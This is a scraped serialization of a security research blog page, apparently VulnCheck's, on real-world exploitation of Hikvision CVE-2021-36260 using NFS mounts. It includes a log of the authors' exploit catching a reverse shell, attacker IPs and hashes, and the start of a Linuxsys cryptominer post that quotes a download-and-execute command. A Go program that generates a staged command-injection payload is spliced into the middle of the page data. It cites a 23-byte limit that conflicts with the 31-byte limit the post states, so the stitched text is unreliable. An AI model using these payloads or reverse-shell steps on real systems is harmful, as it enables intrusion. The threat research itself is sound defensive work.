Just install it and create the share:",[1354,38834,38836],{"className":34366,"code":38835,"language":34368,"meta":219,"style":219},"sudo apt install nfs-kernel-server\nsudo mkdir -p \u002Ftmp\u002Fnfsshare\nsudo chown nobody:nogroup \u002Ftmp\u002Fnfsshare\n",[886,38837,38838,38843,38848],{"__ignoreMap":219},[1373,38839,38840],{"class":1375,"line":1376},[1373,38841,38842],{"class":9383},"sudo apt install nfs-kernel-server\n",[1373,38844,38845],{"class":1375,"line":220},[1373,38846,38847],{"class":9383},"sudo mkdir -p \u002Ftmp\u002Fnfsshare\n",[1373,38849,38850],{"class":1375,"line":1266},[1373,38851,38852],{"class":9383},"sudo chown nobody:nogroup \u002Ftmp\u002Fnfsshare\n",[18,38854,38855,38856,4606],{},"Then add the share to ",[886,38857,38858],{},"\u002Fetc\u002Fexports",[1354,38860,38862],{"className":34366,"code":38861,"language":34368,"meta":219,"style":219},"\u002Ftmp\u002Fnfsshare *(rw,no_root_squash,no_subtree_check)\n",[886,38863,38864],{"__ignoreMap":219},[1373,38865,38866],{"class":1375,"line":1376},[1373,38867,38861],{"class":9383},[18,38869,38870],{},"Then restart services:",[1354,38872,38874],{"className":34366,"code":38873,"language":34368,"meta":219,"style":219},"sudo systemctl restart nfs-kernel-server\nsudo systemctl restart rpcbind\n",[886,38875,38876,38881],{"__ignoreMap":219},[1373,38877,38878],{"class":1375,"line":1376},[1373,38879,38880],{"class":9383},"sudo systemctl restart nfs-kernel-server\n",[1373,38882,38883],{"class":1375,"line":220},[1373,38884,38885],{"class":9383},"sudo systemctl restart rpcbind\n",[18,38887,38888,38889,38891],{},"After this, we can then run the exploit. 
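The seven-byte chunks, the `>` followed by `>>` redirects and the fixed file name `y` in the exploit above all follow from the 23-byte limit noted in its comments. The Go program below is an added illustration, not code from the VulnCheck exploit or from Hikvision: it rebuilds the same staged injection sequence (mkdir, chunked `echo -n` writes, chmod, execute) and checks every `$( ... )` expression against that budget. The function names (`buildStages`, `fitsBudget`, `injectedExpr`) are my own, and the mount command string in `main` is a constructed stand-in rather than the dropper's real output.

```go
package main

import (
	"fmt"
	"strings"
)

// injectBudget is the number of bytes available to the injected $( ... )
// expression, taken from the 23-byte figure in the exploit's comments.
const injectBudget = 23

// chunkSize is the largest chunk that fits the budget once wrapped as
// $(echo -n '<chunk>'>>y): len("$(echo -n '") + chunk + len("'>>y)") == 23.
const chunkSize = injectBudget - len("$(echo -n '") - len("'>>y)") // == 7

// splitByByteSize splits s into consecutive chunks of at most n bytes.
// Bytes, not runes, are what matter to the size-limited buffer on the device.
func splitByByteSize(s string, n int) []string {
	var chunks []string
	for len(s) > n {
		chunks = append(chunks, s[:n])
		s = s[n:]
	}
	if s != "" {
		chunks = append(chunks, s)
	}
	return chunks
}

// wrap puts a shell expression into the XML body the webLanguage handler parses.
func wrap(expr string) string {
	return "<xml><language >$(" + expr + ")</language></xml>"
}

// buildStages returns, in order, the request bodies that create the mount
// directory, drip the script into the file y, make it executable and run it.
// The first write uses > so that anything already in y is clobbered.
// Chunks must not contain a single quote; a mount command never does.
func buildStages(script, dir string) []string {
	stages := []string{wrap("mkdir " + dir)}
	for i, chunk := range splitByByteSize(script, chunkSize) {
		redir := ">"
		if i > 0 {
			redir = ">>"
		}
		stages = append(stages, wrap("echo -n '"+chunk+"'"+redir+"y"))
	}
	return append(stages, wrap("chmod +x y"), wrap("./y"))
}

// injectedExpr returns the $( ... ) portion of a body, i.e. the bytes that
// land inside the size-limited buffer on the device.
func injectedExpr(body string) string {
	start := strings.Index(body, "$(")
	end := strings.LastIndex(body, ")")
	if start < 0 || end < start {
		return ""
	}
	return body[start : end+1]
}

// fitsBudget reports whether every stage's injected expression is within
// injectBudget bytes; false means the device would truncate that stage.
func fitsBudget(stages []string) bool {
	for _, s := range stages {
		if len(injectedExpr(s)) > injectBudget {
			return false
		}
	}
	return true
}

func main() {
	// Constructed stand-in for the dropper's mount command (not the real one).
	script := "mount -o nolock,vers=3 10.12.70.252:/tmp/nfsshare ./abc"
	stages := buildStages(script, "abc")
	for _, s := range stages {
		fmt.Printf("%2d bytes  %s\n", len(injectedExpr(s)), s)
	}
	fmt.Println("all stages within budget:", fitsBudget(stages))
}
```

Each printed line gives the byte count of the injected expression followed by the request body. The first `echo` stage uses `>` and comes in at 22 bytes; every later one is exactly 23, which is why an eight-byte chunk would not fit and why the script has to be dripped in over many requests rather than sent once.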
Below is sample output from our ",[886,38890,16339],{},"-based exploit.",[1354,38893,38895],{"className":31740,"code":38894,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2021-36260\u002Fmountvariant$ .\u002Fbuild\u002Fcve-2021-36260_linux-arm64 -e -rhost 10.12.70.228 -lhost 10.12.70.252 -lport 1270\ntime=2025-07-21T16:59:47.167-04:00 level=STATUS msg=\"Starting listener on 10.12.70.252:1270\"\ntime=2025-07-21T16:59:47.168-04:00 level=STATUS msg=\"Starting target\" index=0 host=10.12.70.228 port=80 ssl=false \"ssl auto\"=false\ntime=2025-07-21T16:59:47.168-04:00 level=STATUS msg=\"Sending a reverse shell payload for 10.12.70.252:1270\"\ntime=2025-07-21T16:59:47.795-04:00 level=SUCCESS msg=\"Caught new shell from 10.12.70.228:56329\"\ntime=2025-07-21T16:59:47.795-04:00 level=STATUS msg=\"Active shell from 10.12.70.228:56329\"\nsh: can't access tty; job control turned off\n\n\nBusyBox v1.19.3 (2020-04-07 16:08:04 CST) built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n\n# ps\n  PID USER      VSZ STAT COMMAND\n1 root      1340 S  init\n… truncated …\n 2193 root      0 RW   [kworker\u002Fu:2]\n 2575 root      1336 S  \u002Fbin\u002Fsh -c tar zxf \u002Fdav\u002F$(.\u002FxqW\u002Fxploit.sh).tar.gz -C\n 2576 root      1340 S  {xploit.sh} \u002Fbin\u002Fsh .\u002FxqW\u002Fxploit.sh\n 2578 root      1336 S  sh -i\n 2579 root      1340 S  telnet 10.12.70.252:1270\n 2580 root      1340 R  ps\n",[886,38896,38897,38926,38956,39022,39047,39074,39099,39112,39116,39120,39125,39140,39144,39149,39154,39159,39163,39168,39173,39178,39183,39188],{"__ignoreMap":219},[1373,38898,38899,38902,38905,38908,38911,38914,38917,38920,38923],{"class":1375,"line":1376},[1373,38900,38901],{"class":2206},"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2021-36260\u002Fmountvariant$",[1373,38903,38904],{"class":1391}," .\u002Fbuild\u002Fcve-2021-36260_linux-arm64",[1373,38906,38907],{"class":2209}," 
-e",[1373,38909,38910],{"class":2209}," -rhost",[1373,38912,38913],{"class":5467}," 10.12.70.228",[1373,38915,38916],{"class":2209}," -lhost",[1373,38918,38919],{"class":5467}," 10.12.70.252",[1373,38921,38922],{"class":2209}," -lport",[1373,38924,38925],{"class":5467}," 1270\n",[1373,38927,38928,38931,38933,38936,38939,38941,38944,38947,38949,38951,38954],{"class":1375,"line":220},[1373,38929,38930],{"class":4640},"time",[1373,38932,5417],{"class":1397},[1373,38934,38935],{"class":1391},"2025-07-21T16:59:47.167-04:00",[1373,38937,38938],{"class":4640}," level",[1373,38940,5417],{"class":1397},[1373,38942,38943],{"class":1391},"STATUS",[1373,38945,38946],{"class":4640}," msg",[1373,38948,5417],{"class":1397},[1373,38950,183],{"class":1387},[1373,38952,38953],{"class":1391},"Starting listener on 10.12.70.252:1270",[1373,38955,19057],{"class":1387},[1373,38957,38958,38960,38962,38965,38967,38969,38971,38973,38975,38977,38980,38982,38985,38987,38989,38992,38994,38997,39000,39002,39005,39008,39010,39012,39014,39017,39019],{"class":1375,"line":1266},[1373,38959,38930],{"class":4640},[1373,38961,5417],{"class":1397},[1373,38963,38964],{"class":1391},"2025-07-21T16:59:47.168-04:00",[1373,38966,38938],{"class":4640},[1373,38968,5417],{"class":1397},[1373,38970,38943],{"class":1391},[1373,38972,38946],{"class":4640},[1373,38974,5417],{"class":1397},[1373,38976,183],{"class":1387},[1373,38978,38979],{"class":1391},"Starting target",[1373,38981,183],{"class":1387},[1373,38983,38984],{"class":4640}," index",[1373,38986,5417],{"class":1397},[1373,38988,445],{"class":1391},[1373,38990,38991],{"class":4640}," host",[1373,38993,5417],{"class":1397},[1373,38995,38996],{"class":1391},"10.12.70.228",[1373,38998,38999],{"class":4640}," port",[1373,39001,5417],{"class":1397},[1373,39003,39004],{"class":1391},"80",[1373,39006,39007],{"class":4640}," 
ssl",[1373,39009,5417],{"class":1397},[1373,39011,5971],{"class":1391},[1373,39013,4883],{"class":1387},[1373,39015,39016],{"class":1391},"ssl auto",[1373,39018,183],{"class":1387},[1373,39020,39021],{"class":1391},"=false\n",[1373,39023,39024,39026,39028,39030,39032,39034,39036,39038,39040,39042,39045],{"class":1375,"line":1852},[1373,39025,38930],{"class":4640},[1373,39027,5417],{"class":1397},[1373,39029,38964],{"class":1391},[1373,39031,38938],{"class":4640},[1373,39033,5417],{"class":1397},[1373,39035,38943],{"class":1391},[1373,39037,38946],{"class":4640},[1373,39039,5417],{"class":1397},[1373,39041,183],{"class":1387},[1373,39043,39044],{"class":1391},"Sending a reverse shell payload for 10.12.70.252:1270",[1373,39046,19057],{"class":1387},[1373,39048,39049,39051,39053,39056,39058,39060,39063,39065,39067,39069,39072],{"class":1375,"line":4692},[1373,39050,38930],{"class":4640},[1373,39052,5417],{"class":1397},[1373,39054,39055],{"class":1391},"2025-07-21T16:59:47.795-04:00",[1373,39057,38938],{"class":4640},[1373,39059,5417],{"class":1397},[1373,39061,39062],{"class":1391},"SUCCESS",[1373,39064,38946],{"class":4640},[1373,39066,5417],{"class":1397},[1373,39068,183],{"class":1387},[1373,39070,39071],{"class":1391},"Caught new shell from 10.12.70.228:56329",[1373,39073,19057],{"class":1387},[1373,39075,39076,39078,39080,39082,39084,39086,39088,39090,39092,39094,39097],{"class":1375,"line":4724},[1373,39077,38930],{"class":4640},[1373,39079,5417],{"class":1397},[1373,39081,39055],{"class":1391},[1373,39083,38938],{"class":4640},[1373,39085,5417],{"class":1397},[1373,39087,38943],{"class":1391},[1373,39089,38946],{"class":4640},[1373,39091,5417],{"class":1397},[1373,39093,183],{"class":1387},[1373,39095,39096],{"class":1391},"Active shell from 10.12.70.228:56329",[1373,39098,19057],{"class":1387},[1373,39100,39101,39104,39107,39109],{"class":1375,"line":4756},[1373,39102,39103],{"class":2206},"sh:",[1373,39105,39106],{"class":1391}," 
can",[1373,39108,1388],{"class":1387},[1373,39110,39111],{"class":1391},"t access tty; job control turned off\n",[1373,39113,39114],{"class":1375,"line":4768},[1373,39115,6520],{"emptyLinePlaceholder":237},[1373,39117,39118],{"class":1375,"line":4792},[1373,39119,6520],{"emptyLinePlaceholder":237},[1373,39121,39122],{"class":1375,"line":4798},[1373,39123,39124],{"class":1391},"BusyBox v1.19.3 (2020-04-07 16:08:04 CST) built-in shell (ash)\n",[1373,39126,39127,39130,39132,39135,39137],{"class":1375,"line":4806},[1373,39128,39129],{"class":1391},"Enter ",[1373,39131,1388],{"class":1387},[1373,39133,39134],{"class":1391},"help",[1373,39136,1388],{"class":1387},[1373,39138,39139],{"class":1391}," for a list of built-in commands.\n",[1373,39141,39142],{"class":1375,"line":4817},[1373,39143,6520],{"emptyLinePlaceholder":237},[1373,39145,39146],{"class":1375,"line":4825},[1373,39147,39148],{"class":1391},"# ps\n",[1373,39150,39151],{"class":1375,"line":4835},[1373,39152,39153],{"class":1391},"  PID USER      VSZ STAT COMMAND\n",[1373,39155,39156],{"class":1375,"line":4843},[1373,39157,39158],{"class":1391},"1 root      1340 S  init\n",[1373,39160,39161],{"class":1375,"line":4849},[1373,39162,36589],{"class":1391},[1373,39164,39165],{"class":1375,"line":4877},[1373,39166,39167],{"class":1391}," 2193 root      0 RW   [kworker\u002Fu:2]\n",[1373,39169,39170],{"class":1375,"line":4915},[1373,39171,39172],{"class":1391}," 2575 root      1336 S  \u002Fbin\u002Fsh -c tar zxf \u002Fdav\u002F$(.\u002FxqW\u002Fxploit.sh).tar.gz -C\n",[1373,39174,39175],{"class":1375,"line":4931},[1373,39176,39177],{"class":1391}," 2576 root      1340 S  {xploit.sh} \u002Fbin\u002Fsh .\u002FxqW\u002Fxploit.sh\n",[1373,39179,39180],{"class":1375,"line":4947},[1373,39181,39182],{"class":1391}," 2578 root      1336 S  sh -i\n",[1373,39184,39185],{"class":1375,"line":4952},[1373,39186,39187],{"class":1391}," 2579 root      1340 S  telnet 
10.12.70.252:1270\n",[1373,39189,39190],{"class":1375,"line":6776},[1373,39191,39192],{"class":1391}," 2580 root      1340 R  ps\n",[18,39194,39195,39196,1554,39198,39200],{},"Here you can see that exploitation happens, basically, instantly. Much faster than using ",[886,39197,37685],{},[886,39199,22966],{}," to drop the payload.",[1920,39202,39204],{"id":39203},"more-on-in-the-wild","More On In The Wild",[18,39206,39207,39208,39211],{},"Curiously, the attacker’s exploit doesn't work on our test Hikvision camera. The exploit (greatly) overruns the size limitation imposed by the vulnerable binary. Upon examining the binary, we found that the command injection must respect a strict 0x1f (31-byte) space restriction enforced by a ",[886,39209,39210],{},"snprintf"," call.",[18,39213,39214],{},"Below is a Ghidra screenshot of the decompiled function illustrating this limitation:",[18,39216,39217],{},[68,39218],{":width":10862,"alt":39219,"src":39220},"Davinci in Ghidra","\u002Fblog\u002Fhikvision-mount-shell\u002Fghidra.png",[18,39222,39223,39224,39227,39228,39230,39231,59],{},"Presumably, there is a subset of firmware that uses ",[886,39225,39226],{},"sprintf"," instead of ",[886,39229,39210],{},", and the attacker has limited themselves to this subset of victims. We do believe that their exploit must work somewhere, though, because we can see their infrastructure on Shodan",[47,39232,39234],{"href":39233},"#user-content-fn-14","14",[18,39236,39237],{},[68,39238],{":width":10862,"alt":39239,"src":39240},"Available port mapper","\u002Fblog\u002Fhikvision-mount-shell\u002Fportmapper-shodan.png",[18,39242,39243,39244,39247],{},"The attacks we observed originated from 195.3.221[.]137. Our friends over at GreyNoise",[47,39245,28534],{"href":39246},"#user-content-fn-15"," associate this IP address with a handful of other CVEs as well. 
Additionally, we linked this attacker to payload delivery from these IP addresses: 31.59.40[.]187, 45.125.66[.]79, 87.121.84[.]34, 141.11.62[.]222, 220.158.232[.]99.",[18,39249,39250,39251,39255,39256,39260],{},"Examining a couple of these hosts reveals some real oddball payload delivery mechanisms",[47,39252,39254],{"href":39253},"#user-content-fn-16","16",". However, not at all oddly, the served binaries appear to be pretty standard Mirai-like",[47,39257,39259],{"href":39258},"#user-content-fn-17","17"," payloads.",[18,39262,39263],{},[68,39264],{":width":10862,"alt":39265,"src":39266},"Odd payload delivery","\u002Fblog\u002Fhikvision-mount-shell\u002Fweird-shodan.png",[1920,39268,39270],{"id":39269},"indicators-and-detections","Indicators and Detections",[18,39272,32391,39273,39276],{},[47,39274,1245],{"href":1243,"rel":39275},[51]," customers have access to Suricata and Snort rules that detect exploitation of all the aforementioned exploited CVEs:",[307,39278,39279,39288],{},[310,39280,39281],{},[313,39282,39283,39285],{},[316,39284,319],{},[316,39286,39287],{},"VulnCheck SID",[336,39289,39290],{},[313,39291,39292,39294],{},[341,39293,37587],{},[341,39295,39296],{},"12700001",[18,39298,39299],{},"Additionally, the following details of the activity we observed should help others detect and block this activity in the future.",[61,39301,39303],{"id":39302},"source-of-exploitation","Source of exploitation",[22,39305,39306],{},[25,39307,39308],{},"195.3.221[.]137",[61,39310,39312],{"id":39311},"malware-hosting-callback-sites","Malware Hosting & Callback Sites",[22,39314,39315,39318,39321,39324,39327],{},[25,39316,39317],{},"31.59.40[.]187",[25,39319,39320],{},"45.125.66[.]79",[25,39322,39323],{},"87.121.84[.]34",[25,39325,39326],{},"141.11.62[.]222",[25,39328,39329],{},"220.158.232[.]99",[61,39331,39333],{"id":39332},"sha-1-hashes","SHA-256 Hashes",
[307,39335,39336,39346],{},[310,39337,39338],{},[313,39339,39340,39343],{},[316,39341,39342],{},"Filename",[316,39344,39345],{},"SHA-256",[336,39347,39348],{},[313,39349,39350,39353],{},[341,39351,39352],{},"a5le1w",[341,39354,39355],{},"48d2c2c68fa0bd44eb70c1a6cf572406442b289fb6030e946f0530ce6f9fad98",[1920,39357,202],{"id":201},[18,39359,39360,39361,1246,39365,5437,39368,1255,39371,59],{},"The VulnCheck team is always on the lookout for new exploitation in the wild. For more research like this, see our blogs, ",[47,39362,39364],{"href":35920,"rel":39363},[51],"The Linuxsys Coinminer",[47,39366,36637],{"href":36635,"rel":39367},[51],[47,39369,35931],{"href":35927,"rel":39370},[51],[47,39372,22211],{"href":22207,"rel":39373},[51],[18,39375,33941,39376,33945,39379,1240,39382,982,39385,1260],{},[47,39377,1233],{"href":10806,"rel":39378},[51],[47,39380,1239],{"href":1237,"rel":39381},[51],[47,39383,1245],{"href":1243,"rel":39384},[51],[47,39386,216],{"href":1258,"rel":39387},[51],[1920,39389,2850],{"id":2849},[61,39391,36665],{"id":36664},[1789,39393,39394,39402,39410,39417,39425,39433,39441,39449,39458,39467,39476,39485,39494,39503,39512,39521,39530],{},[25,39395,39396,10515,39400],{},[47,39397,39398],{"href":39398,"rel":39399},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=html%3A%22%2Fdoc%2Fpage%2Flogin.asp%3F_%22+%2B%22Server%22%2C%22ETag%22%2C%22Version%22",[51],[47,39401,36677],{"href":36676},[25,39403,39404,10515,39408],{},[47,39405,39406],{"href":39406,"rel":39407},"https:\u002F\u002Fmedia.defense.gov\u002F2022\u002FOct\u002F06\u002F2003092365\u002F-1\u002F-1\u002F0\u002FJoint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF",[51],[47,39409,36677],{"href":36686},[25,39411,39412,10515,39415],{},[47,39413,37484],{"href":37484,"rel":39414},[51],[47,39416,36677],{"href":36695},[25,39418,39419,10515,39423],{},[47,39420,39421],{"href":39421,"rel":39422},"https:\u002F\u002Fwww.forescout.com\u002Fblog\u002Fdoj-moobot-botnet-commandeered-by-russian-apt28-analys
is-of-attacks-against-routers-and-malware-samples\u002F",[51],[47,39424,36677],{"href":36704},[25,39426,39427,10515,39431],{},[47,39428,39429],{"href":39429,"rel":39430},"https:\u002F\u002Fviz.greynoise.io\u002Ftags\u002Fhikvision-ip-camera-rce-attempt?days=90",[51],[47,39432,36677],{"href":36713},[25,39434,39435,10515,39439],{},[47,39436,39437],{"href":39437,"rel":39438},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fvulnerability\u002Fmap\u002F?day=2025-07-17&host_type=src&vulnerability=cve-2021-36260",[51],[47,39440,36677],{"href":36722},[25,39442,39443,10515,39446],{},[47,39444,37718],{"href":37718,"rel":39445},[51],[47,39447,36677],{"href":39448},"#user-content-fnref-7",[25,39450,39451,10515,39455],{},[47,39452,39453],{"href":39453,"rel":39454},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fpull\u002F16204\u002Ffiles#diff-6bb892f1499191dd276796704d22749899d3d7440f51ddc5357ac177ee76b9ab",[51],[47,39456,36677],{"href":39457},"#user-content-fnref-8",[25,39459,39460,10515,39464],{},[47,39461,39462],{"href":39462,"rel":39463},"https:\u002F\u002Fgtfobins.github.io\u002Fgtfobins\u002Fmount\u002F",[51],[47,39465,36677],{"href":39466},"#user-content-fnref-9",[25,39468,39469,10515,39473],{},[47,39470,39471],{"href":39471,"rel":39472},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FPortmap",[51],[47,39474,36677],{"href":39475},"#user-content-fnref-10",[25,39477,39478,10515,39482],{},[47,39479,39480],{"href":39480,"rel":39481},"https:\u002F\u002Fgithub.com\u002Ftravisbgreen\u002Fhunting-rules\u002Fblob\u002Fmaster\u002Fhunting.rules#L472",[51],[47,39483,36677],{"href":39484},"#user-content-fnref-11",[25,39486,39487,10515,39491],{},[47,39488,39489],{"href":39489,"rel":39490},"https:\u002F\u002Frules.emergingthreats.net\u002Fopen\u002Fsuricata-6.0\u002Femerging-all.rules",[51],[47,39492,36677],{"href":39493},"#user-content-fnref-12",[25,39495,39496,10515,39500],{},[47,39497,39498],{"href":39498,"rel":39499},"http
s:\u002F\u002Fgithub.com\u002Fwillscott\u002Fgo-nfs",[51],[47,39501,36677],{"href":39502},"#user-content-fnref-13",[25,39504,39505,10515,39509],{},[47,39506,39507],{"href":39507,"rel":39508},"https:\u002F\u002Fwww.shodan.io\u002Fhost\u002F87.121.84.34",[51],[47,39510,36677],{"href":39511},"#user-content-fnref-14",[25,39513,39514,10515,39518],{},[47,39515,39516],{"href":39516,"rel":39517},"https:\u002F\u002Fviz.greynoise.io\u002Fip\u002F195.3.221.137",[51],[47,39519,36677],{"href":39520},"#user-content-fnref-15",[25,39522,39523,10515,39527],{},[47,39524,39525],{"href":39525,"rel":39526},"https:\u002F\u002Fwww.shodan.io\u002Fhost\u002F141.11.62.222",[51],[47,39528,36677],{"href":39529},"#user-content-fnref-16",[25,39531,39532,10515,39536],{},[47,39533,39534],{"href":39534,"rel":39535},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F48d2c2c68fa0bd44eb70c1a6cf572406442b289fb6030e946f0530ce6f9fad98",[51],[47,39537,36677],{"href":39538},"#user-content-fnref-17",[2901,39540,39541],{},"",{"title":219,"searchDepth":220,"depth":220,"links":39543},[39544,39545,39546,39547],{"id":39302,"depth":220,"text":39303},{"id":39311,"depth":220,"text":39312},{"id":39332,"depth":220,"text":39333},{"id":36664,"depth":220,"text":36665},"2025-07-24","VulnCheck researchers spotted a novel use of the \"mount\" command in real-world exploitation of Hikvision CVE-2021-36260. The attacker used NFS to drop and execute binaries, bypassing traditional download methods and evading common detection signatures. This technique has since been integrated into VulnCheck’s open-source go-exploit framework.",{"slug":39551},"hikvision-mount-shell","\u002Fblog\u002Fhikvision-mount-shell",{"title":35917,"description":39549},"blog\u002Fhikvision-mount-shell",[2941,242,1281,23275,1279],"Y5dkSO1JN4KHDuaGecB9e_iBYgx97hokLk8kFAhGf9Y",{"id":39558,"title":36760,"articles":39559,"authors":39582,"body":39584,"date":39563,"description":40489,"extension":234,"image":7,"link":7,"meta":40490,"navigation":237,"path":40492,"seo":40493,"series":7,"stem":40494,"subtype":7,"tags":40495,"__hash__":40496},"blog\u002Fblog\u002Flinuxsys-cryptominer.md",[39560,39564,39568,39572,39575,39578],{"title":39561,"source":14382,"link":39562,"date":39563},"Hackers Exploit Apache HTTP Server Flaw to Deploy Linuxsys Cryptocurrency Miner","https:\u002F\u002Fthehackernews.com\u002F2025\u002F07\u002Fhackers-exploit-apache-http-server-flaw.html","2025-07-17",{"title":39565,"source":39566,"link":39567,"date":39563},"Law enforcement disrupts pro-Russian hacker group","The CyberWire","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F14\u002F135",{"title":39569,"source":12153,"link":39570,"date":39571},"Apache HTTP Server, Exchange Server exploits used for cryptominer, backdoor 
deployment","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fapache-http-server-exchange-server-exploits-used-for-cryptominer-backdoor-deployment","2025-07-18",{"title":39573,"source":12145,"link":39574,"date":39571},"Years Long Linux Cryptominer Spotted Using Legit Sites to Spread Malware","https:\u002F\u002Fhackread.com\u002Flinux-cryptominer-using-legit-sites-to-spread-malware\u002F",{"title":39576,"source":12157,"link":39577,"date":39571},"Risky Bulletin: New phishing technique bypasses FIDO keys - Risky Business Media","https:\u002F\u002Frisky.biz\u002Frisky-bulletin-new-phishing-technique-bypasses-fido-keys\u002F",{"title":39579,"source":39580,"link":39581,"date":39571},"Apache HTTP Server, Exchange Server Exploits Used for Cryptominer, Backdoor Deployment","SC Magazine UK","https:\u002F\u002Finsight.scmagazineuk.com\u002Fapache-http-server-exchange-server-exploits-used-for-cryptominer-backdoor-deployment",[39583],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":39585,"toc":40482},[39586,39589,39591,39608,39611,39615,39621,39627,39641,39649,39795,39798,39825,39839,39845,39855,40102,40111,40115,40144,40151,40221,40242,40254,40259,40262,40265,40267,40272,40334,40336,40338,40346,40350,40358,40362,40384,40386,40427,40431,40437,40439,40463,40477,40479],[263,39587],{":list":39588,"ico":266,"title":20},"[\"The Linuxsys cryptominer has been part of a long-running campaign exploiting multiple vulnerabilities with a consistent attacker methodology since at least 2021.\",\"The attacker leverages compromised legitimate websites to distribute malware, enabling stealthy delivery and evasion of detection.\",\"VulnCheck customers can detect these attacks using our Initial Access Intelligence Suricata and Snort rules.\",\"Additional indicators of compromise are provided to help defenders identify and respond to related 
threats.\"]",[1920,39590,11648],{"id":11647},[18,39592,14428,39593,39597,39598,39602,39603,39607],{},[47,39594,1514],{"href":39595,"rel":39596},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2021-41773",[51]," in the wild. This, in itself, is hardly noteworthy. The vulnerability was an inaugural member of both the CISA KEV and ",[47,39599,1233],{"href":39600,"rel":39601},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-kev",[51],". Our friends over at ",[47,39604,11029],{"href":39605,"rel":39606},"https:\u002F\u002Fviz.greynoise.io\u002Ftags\u002Fapache-http-server-path-traversal-attempt?days=1",[51]," still see exploit attempts for this vulnerability a couple of dozen times each day. The noteworthy part is who was doing the exploiting.",[18,39609,39610],{},"To understand that, let’s look at how the attacks were carried out.",[1920,39612,39614],{"id":39613},"exploitation-methodology","Exploitation Methodology",[18,39616,39617,39618,39620],{},"Between July 1 and July 16, 2025, we observed IP address 103.193.177",[1373,39619,59],{},"152 repeatedly attempting to exploit our Apache 2.4.49 canary.",[18,39622,39623],{},[68,39624],{":width":10862,"alt":39625,"src":39626},"Linuxsys exploit attempt","\u002Fblog\u002Flinuxsys-cryptominer\u002Fexploit-pcap.png",[18,39628,39629,39630,1554,39632,39634,39635,39638,39639,59],{},"Exploitation is straightforward. The attacker attempts to use either ",[886,39631,1557],{},[886,39633,1553],{}," to download a file from ",[886,39636,39637],{},"repositorylinux[.]org",". The domain was registered a year ago and was likely placed behind Cloudflare in January 2025. According to ICANN records, that was the domain’s last update, which corresponds with the earliest public analysis we found on Joe Sandbox",[1373,39640,34237],{},[18,39642,2245,39643,39646,39648],{},[886,39644,39645],{},"linux.sh",[1373,39647,34289],{}," script is interesting. 
It attempts to download a configuration file and coinminer (linuxsys) from five different compromised hosts before exiting. The download attempt looks like:",[1354,39650,39652],{"className":31740,"code":39651,"language":2186,"meta":219,"style":219},"cd .\u002F; curl -s --connect-timeout 10 \u003Ccompromised>\u002Fconfig.json -k -o config.json || wget -q -O config.json \u003Ccompromised>\u002Fconfig.json --timeout=10 --tries=3 --no-check-certificate; curl -s --connect-timeout 10 \u003Ccompromised>\u002Fapp\u002Flinux.bin -k -o linuxsys || wget -q -O linuxsys \u003Ccompromised>\u002Flinux.bin --timeout=10 --tries=3 --no-check-certificate; chmod +x linuxsys; .\u002Flinuxsys\n",[886,39653,39654],{"__ignoreMap":219},[1373,39655,39656,39658,39661,39664,39666,39668,39671,39674,39676,39679,39682,39684,39687,39690,39693,39696,39698,39701,39703,39706,39708,39710,39712,39714,39716,39718,39721,39724,39726,39728,39730,39732,39734,39736,39738,39740,39742,39744,39747,39749,39751,39754,39756,39758,39760,39762,39764,39766,39768,39770,39772,39775,39777,39779,39781,39783,39786,39788,39790,39792],{"class":1375,"line":1376},[1373,39657,21460],{"class":1379},[1373,39659,39660],{"class":1391}," .\u002F",[1373,39662,39663],{"class":1383},";",[1373,39665,2222],{"class":2206},[1373,39667,2239],{"class":2209},[1373,39669,39670],{"class":2209}," --connect-timeout",[1373,39672,39673],{"class":5467}," 10",[1373,39675,27250],{"class":1397},[1373,39677,39678],{"class":1391},"compromise",[1373,39680,39681],{"class":4640},"d",[1373,39683,5384],{"class":1397},[1373,39685,39686],{"class":1391},"\u002Fconfig.json",[1373,39688,39689],{"class":2209}," -k",[1373,39691,39692],{"class":2209}," -o",[1373,39694,39695],{"class":1391}," config.json",[1373,39697,2219],{"class":1397},[1373,39699,39700],{"class":2206}," wget",[1373,39702,31882],{"class":2209},[1373,39704,39705],{"class":2209}," 
-O",[1373,39707,39695],{"class":1391},[1373,39709,27250],{"class":1397},[1373,39711,39678],{"class":1391},[1373,39713,39681],{"class":4640},[1373,39715,5384],{"class":1397},[1373,39717,39686],{"class":1391},[1373,39719,39720],{"class":2209}," --timeout=10",[1373,39722,39723],{"class":2209}," --tries=3",[1373,39725,2210],{"class":2209},[1373,39727,39663],{"class":1383},[1373,39729,2222],{"class":2206},[1373,39731,2239],{"class":2209},[1373,39733,39670],{"class":2209},[1373,39735,39673],{"class":5467},[1373,39737,27250],{"class":1397},[1373,39739,39678],{"class":1391},[1373,39741,39681],{"class":4640},[1373,39743,5384],{"class":1397},[1373,39745,39746],{"class":1391},"\u002Fapp\u002Flinux.bin",[1373,39748,39689],{"class":2209},[1373,39750,39692],{"class":2209},[1373,39752,39753],{"class":1391}," linuxsys",[1373,39755,2219],{"class":1397},[1373,39757,39700],{"class":2206},[1373,39759,31882],{"class":2209},[1373,39761,39705],{"class":2209},[1373,39763,39753],{"class":1391},[1373,39765,27250],{"class":1397},[1373,39767,39678],{"class":1391},[1373,39769,39681],{"class":4640},[1373,39771,5384],{"class":1397},[1373,39773,39774],{"class":1391},"\u002Flinux.bin",[1373,39776,39720],{"class":2209},[1373,39778,39723],{"class":2209},[1373,39780,2210],{"class":2209},[1373,39782,39663],{"class":1383},[1373,39784,39785],{"class":2206}," chmod",[1373,39787,31893],{"class":1391},[1373,39789,39753],{"class":1391},[1373,39791,39663],{"class":1383},[1373,39793,39794],{"class":2206}," .\u002Flinuxsys\n",[18,39796,39797],{},"The current iteration of the script uses the following list of compromised 
